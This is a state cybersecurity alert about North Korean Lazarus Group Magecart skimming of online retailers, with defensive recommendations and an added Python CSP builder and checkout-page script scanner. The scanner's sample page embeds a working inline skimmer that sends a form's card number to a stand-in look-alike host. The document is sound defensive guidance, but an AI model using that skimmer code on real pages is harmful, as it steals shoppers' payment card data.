Recent Magecart Attacks Linked to North Korean APT

NJCCIC Alert

Original Release Date: 7/10/2020

Summary

New research attributes a recent series of web skimming attacks to the North Korean government-affiliated advanced persistent threat (APT) group known as the Lazarus Group or HIDDEN COBRA. This campaign, of the type commonly known as Magecart, has been active since May 2019 and is tied to the group through known infrastructure and unique patterns in malware code used in previously attributed campaigns. To evade detection and monetize the skimming, HIDDEN COBRA built a global exfiltration network out of compromised websites to collect stolen payment card data. Several domain names closely resembling consumer brands were also registered anonymously and used to load the malicious script and receive card information. Victims include dozens of retailers, among them Claire’s, Focus Camera, and Paper Source. Exfiltration nodes have been identified worldwide, including an Italian modeling agency and a New Jersey bookstore. Although the group has previously been tied to financially motivated cyber-attacks following the sanctions imposed on North Korea, this is the first Magecart activity attributed to it. As consumers adjust to pandemic conditions and shift more purchases to online shopping, retailers are an increasingly attractive target for skimming attacks.

Recommendations

The NJCCIC recommends that website administrators monitor their systems for malicious activity, use only vetted first-party code, ensure hardware and software are up to date, use a web application firewall (WAF) to block and alert on potential code injection attempts, implement a Content Security Policy (CSP) that restricts the origins from which scripts may load and the destinations to which the browser may send data, and schedule routine website scans to detect changes in the JavaScript served on checkout pages. Additionally, we encourage online consumers to follow the recommendations provided in the NJCCIC alert, Online Shopping and Cybersecurity. Technical details and Indicators of Compromise (IoCs) can be found in the Sansec article.
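The following is an added example, not NJCCIC tooling and not taken from the Sansec research, showing two of the recommendations above in working code: generating a CSP that confines script loading and data egress to vetted hosts, and a routine scan that flags scripts loaded from unvetted hosts or inline scripts whose hash is not in a stored baseline. The allowlisted hosts, the baseline script, and the sample checkout page (including the look-alike `static.shop-cdn.example` and `assets-shop.example` names) are all constructed for the example and are not the campaign's real infrastructure.

```python
"""Routine skimmer check for a checkout page (added example, not NJCCIC's tooling).

Assumptions for this example: the site owner maintains an allowlist of vetted
script and data-egress hosts, and a baseline of SHA-256 hashes of the inline
scripts the page is expected to carry. The HTML below is a constructed sample.
"""
import hashlib
import re
from urllib.parse import urlparse

# Hosts whose JavaScript the site owner has vetted (assumed allowlist).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "static.shop.example"}
# Hosts the browser may legitimately send data to (assumed payment processor).
ALLOWED_CONNECT_HOSTS = {"shop.example", "api.payments.example"}


def build_csp() -> str:
    """Content-Security-Policy header value confining script sources and egress."""
    script_src = " ".join(sorted(ALLOWED_SCRIPT_HOSTS))
    connect_src = " ".join(sorted(ALLOWED_CONNECT_HOSTS))
    return (
        "default-src 'self'; "
        f"script-src 'self' {script_src}; "
        f"connect-src 'self' {connect_src}; "
        f"form-action 'self' {connect_src}; "
        "object-src 'none'; base-uri 'self'; "
        "report-uri /csp-report"
    )


SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def extract_scripts(html: str):
    """Return (external_srcs, inline_bodies) for every <script> in the page."""
    external, inline = [], []
    for attrs, body in SCRIPT_RE.findall(html):
        m = SRC_RE.search(attrs)
        if m:
            external.append(m.group(1))
        else:
            inline.append(body.strip())
    return external, inline


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def scan_page(html: str, baseline_hashes: set) -> list:
    """Flag scripts from unvetted hosts and inline scripts absent from the baseline."""
    findings = []
    external, inline = extract_scripts(html)
    for src in external:
        host = urlparse(src).hostname
        if host is None:  # relative URL, served by the site itself
            continue
        if host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(f"unvetted script host: {host} ({src})")
    for body in inline:
        digest = sha256_hex(body)
        if digest not in baseline_hashes:
            findings.append(f"inline script not in baseline: sha256={digest[:16]}...")
    return findings


# Constructed baseline: the one inline script the checkout page is known to carry.
KNOWN_GOOD_INLINE = "window.cartTotal = document.getElementById('total').value;"
BASELINE = {sha256_hex(KNOWN_GOOD_INLINE)}

# Constructed sample page: one vetted script, one look-alike host, one injected
# inline skimmer that copies the card number into an image request.
SAMPLE_HTML = """<html><head>
<script src="https://static.shop.example/checkout.js"></script>
<script src="https://static.shop-cdn.example/jquery.min.js"></script>
</head><body>
<script>window.cartTotal = document.getElementById('total').value;</script>
<script>document.forms[0].addEventListener('submit', function(e){
  new Image().src = 'https://assets-shop.example/p?d=' + btoa(e.target.cardNumber.value);
});</script>
</body></html>"""


def run_sample() -> list:
    """Scan the constructed page; expect two findings (look-alike host, new inline)."""
    return scan_page(SAMPLE_HTML, BASELINE)


if __name__ == "__main__":
    print("Content-Security-Policy:", build_csp())
    for finding in run_sample():
        print("FINDING:", finding)
```

Run `scan_page` against a scheduled fetch of the live checkout page and alert on any finding; the CSP is deployed as a response header, and a `report-uri` endpoint gives an early signal when a browser blocks an attempted load or egress that the policy does not allow. Note that a CSP on the merchant's own page does not stop a skimmer served from a host that is on the allowlist, which is why the hash baseline and the host allowlist are used together.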

New Jersey Cybersecurity & Communications Integration Cell

2 Schwarzkopf Dr, Ewing Township, NJ 08628

njccic@cyber.nj.gov
